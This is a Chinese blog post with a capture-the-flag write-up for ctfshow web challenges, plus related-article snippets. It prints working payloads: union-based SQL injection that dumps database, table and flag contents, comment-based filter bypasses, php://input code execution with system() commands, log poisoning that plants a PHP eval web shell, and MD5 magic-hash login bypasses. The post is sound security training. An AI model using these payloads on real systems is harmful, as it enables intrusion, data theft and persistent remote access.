ctfshow-web

已于 2022-07-20 09:20:00 修改
阅读量679 收藏 1
点赞数
文章标签: 前端 数据库
于 2022-07-15 21:36:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43618536/article/details/125811856
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

ctfshow-web

题目

一、web签到题

1.打开源代码,发现base64
2.打开Cybercher网站,进行解密,得到flag

二、web2

提示:最简单的SQL注入
用burpsuite输入,查看响应

1.万能账号

a' or true #

2.测试
测试长度,无回显
测试注入点
2为注入点

a' union select 1,2,3 #

3.爆数据库
web2

a' union select 1,database(),3 #

4.爆表名

a' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2' #

5.爆字段
flag

a' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag' #

6.爆数据

a' union select 1,group_concat(flag),3 from web2.flag #

7.获得flag

三、web3

提示:更简单的web题
用burpsuite

?url=php://input

POST:

<?php system('ls');?>
<?php system("cat ctf_go_go_go");?>

四、web4

提示:文件包含、日志文件

?url=/var/log/nginx/access.log

UA头部:

<?php eval($_POST[1]);?>

蚁剑连接
找到flag.txt文件,得到flag

五、web5

<?php
        $flag="";
        $v1=$_GET['v1'];
        $v2=$_GET['v2'];
        if(isset($v1) && isset($v2)){
            if(!ctype_alpha($v1)){
                die("v1 error");
            }
            if(!is_numeric($v2)){
                die("v2 error");
            }
            if(md5($v1)==md5($v2)){
                echo $flag;
            }
        }else{
        
            echo "where is flag?";
        }
    ?>

ctype_alpha:检测函数,用来检测所给参数是不是字母的函数。
is_numeric : 检测变量是否为数字或数字字符串

使用科学计数法
v1需要输入字母:QNKCDZO
v2需要输入数字:240610708

?v1=QNKCDZO&v2=240610708

六、web6

sql注入,过滤了空格

1'/**/union/**/select/**/1,group_concat(flag),3/**/from/**/web2.flag/**/#

七、web7

浏览页面时,发现点进文章中,网站后会带有?id=1
由此得知,本题是sql注入题

空格过滤
1.测试注入长度

?id=1'/**/order/**/by/**/3/**/#

2.测试注入点
2,3皆为注入点

?id=1'/**/union/**/select/**/1,2,3/**/#

3.爆数据

?id=1'/**/union/**/select/**/1,group_concat(flag),3/**/from/**/web7.flag#

八、web8(未做)

九、web9

ffifdyop:md5的万能密码

林本
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow web系列
RealIiikun的博客
04-07 940
源代码要求v1为为字母,v2为数字,并且v1与v2的md5值相同md5漏洞介绍:PHP在处理字符串时,它把每一个以“0E”开头的哈希值都解释为0所以只要v1与v2的md5值以0E开头即可。常见的0e开头的MD5和原值QNKCDZO240610708。
ctfshow web入门 内网渗透篇
羽的博客
06-26 2190
首先在登录函数中存在doFilter对传入的用户名密码进行过滤,所以很难去注入。再来看下另外一台靶机,因为存在web服务,但是又不能出网所以通过ssh端口映射到本地来。没错,可以用phar,毕竟我们还有个文件上传的功能,后面需要做的就是这么触发phar。没有使用doFilter函数过滤,只是要求了我们传入的参数需要符合email格式。先看下445端口,靶机给我们提供了msf,所以直接用msf打下Samba。在api/index.php中存在一个写文件的功能,假如可以控制。的值,就可以写入一个木马进去。
2024年最全ctfshow-WEB-web7_ctfshow web7
最新发布
2401_84300255的博客
05-02 270
从url地址栏中可以看到,页面通过文章的id值来查询文章内容,我们可以考虑SQL注入漏洞首先判断注入点,输入以下payload,使SQL恒成立可以看到,页面正常显示在输入以下payload,使SQL恒不成立可以看到,页面空显示由此可以判断页面存在SQL注入,注入点为,页面中有显示位,可以尝试进行脱库先来判断显示位,此处id传一个-1,由于id通常不为负数,后端根据id查询不到内容,就只能展示联合查询的结果,从而帮助我们判断字段显示的位置。
CTFshow 每日一练
m0_73867210的博客
01-02 521
一、web签到题 打开链接 查看源码 利用base64解码得到flag 二、web2 看到有提示--SQL注入 先试着使用万能密码登陆 发现有回显,直接sql注入 ' or 1=1 order by 3# 发现到4时不回显 开始爆库名,看看哪个位置会回显 ' or 1=1 union select 1,2,3# ' or 1=1 union select 1,database(),3# 得到库名:web2,爆表名 ' or 1
CTF show----web 解题笔记(web7~web10)
weixin_45908624的博客
01-05 592
ctfshow web7-web10
CTFshow 1-10关
weixin_62369433的博客
11-11 2133
CTFshow 1-10 通关详解
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFShow-周末大挑战parse-url篇Writeup
05-19
这篇Writeup主要涉及的是CTF(Capture The Flag)挑战中的Web安全领域,特别是URL解析漏洞的利用。CTF是一项网络安全竞赛,参与者通过解谜、破解密码等方式获取“国旗”(Flag),在这里指的是挑战的答案或关键信息...
ctfshow web7
博客地址 www.sec0nd.top
02-25 974
文章目录题目分析解题过程 题目分析 打开题目后,有三个文章 随便点一个之后发现网址上有个后缀 ?id=2 应该是get传参的注入了 在后缀上加 ?id=1||1 显示全部文章,可能是整形注入,还是盲注 他这个过滤了空格,用/**/代替(详见web6 wp) 解题过程 盲注都是一个字一个字对比,很麻烦,所以这里用大佬的脚本做题 import requests s=requests.session() url='http://376f6454-37f5-47df-aa98-bfd375f0f8d9.ch
ctf.show web7
qq_53319483的博客
11-17 3518
ctf.show web7
CTFweb篇——签到题
热门推荐
suiyideAli的博客
09-21 1万+
0x00 前言 一个简单的CTF签到题。 0x01.打开靶场 0x02 打开靶场地址发现信息,通过题目提示信息使用burpsuit抓包 Send to Repeater 然后查看 Repeater 点击GO 在Response中 Headers 找到Flag ok完成。 ...
11月11号考核
weixin_74328163的博客
11-19 380
直接给它换个方式打开,撇到浏览器里面,右键点个全选都有一串蓝色的。复制粘贴到别的地方就ok了。就可以得到flag了。可以得到提瓦特大陆密码,可以一个一个对照就可以翻译出flag。无非让我们去修改这个图片的高度从而得到flag。图片闪动截图flag,拼手速。图片提取文字就可以得到flag了。利用ctrl+f键文本搜索flag形式。就可以直接得到flag。这个图片上都注释了我可以假装看不见。下载完文件直接将其扔到010里面。将文本放入其中可以直接得到flag。可以直接领悟熊说的话。直接浏览器搜索熊曰。
2024腾龙杯web签到题-初识jwt(签到:这是一个登录页面)
Welcome To Myon'Blog !
03-18 694
它是 JSON Web Token 的缩写,是一个开放标准,定义了一种紧凑的、自包含的方式,用于作为JSON对象在各方之间安全地传输信息,该信息可以被验证和信任,因为它是数字签名的。它就是一种认证机制,让后台知道该请求是来自于受信的客户端。jwt 由三部分组成,它们之间用圆点(.)连接,这三部分分别是:Header、Payload、Signature。回到最初请求的 login , post 传入 json 格式的 tooken。回显得到一个 token ,也是 json 的格式。
ISCC 2017 部分解题记录 By Assassin
Assassin
06-04 4542
Basic 50 Wheel Cipher 加密表: 1: < ZWAXJGDLUBVIQHKYPNTCRMOSFE < 2: < KPBELNACZDTRXMJQOYHGVSFUWI < 3: < BDMAIZVRNSJUWFHTEQGYXPLOCK < 4: < RPLNDVHGFCUKTEBSXQYIZMJWAO < 5: < IHFRLABEUOTSGJVDKCPMNZQWXY
CTFSHOW 签到题
MrTreebook的博客
12-05 1044
CTFSHOW 萌新赛 签到题1.题目下载地址2. checksec检查保护3.IDA分析4.构造ROP链4.exp 1.题目下载地址 点击下载题目 2. checksec检查保护 堆不可执行 3.IDA分析 看到了gets()函数,很明显存在溢出 需要知道64位系统和32位系统的区别 64 位系统传参从第一个到第六个依次保存在rdi,rsi,rdx,rcx,r8,r9 从第7个参数开始,接下来的所有参数都才通过栈传递 4.构造ROP链 我们需要找到合适的 gadgets,利用 ROPgadget a
南邮 ctf web(部分题)
h1012946585的博客
05-04 8367
1:签到题 http://chinalover.sinaapp.com/web1/打开源代码:原来key在这里。 (lll¬ω¬)!!2:md5 collision http://chinalover.sinaapp.com/web19/看到源码是关于md5加密的:“QNKCDZO”那么,先看看他加密后变成什么样子。顺便推荐一个加密解密很方便的网站:http://web2hack...
CTFShow-Web6
09-06
根据提供的引用内容,CTFShow-Web6可能是一个数据库名。其中,通过注入语句查询数据库web2中的表信息,得到两张表flag和user。具体的注入语句如下所示: ``` username=1'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#&password=1 ``` ``` username='/**/or/**/1=2/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema='web2'#&password=123 ``` 通过这些注入语句可以得到数据库web2中的两张表信息,分别为flag和user。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [CTFshow之web6](https://blog.csdn.net/zzwwhhpp/article/details/116498386)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [ctfshow-web6](https://blog.csdn.net/weixin_52497013/article/details/122095160)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值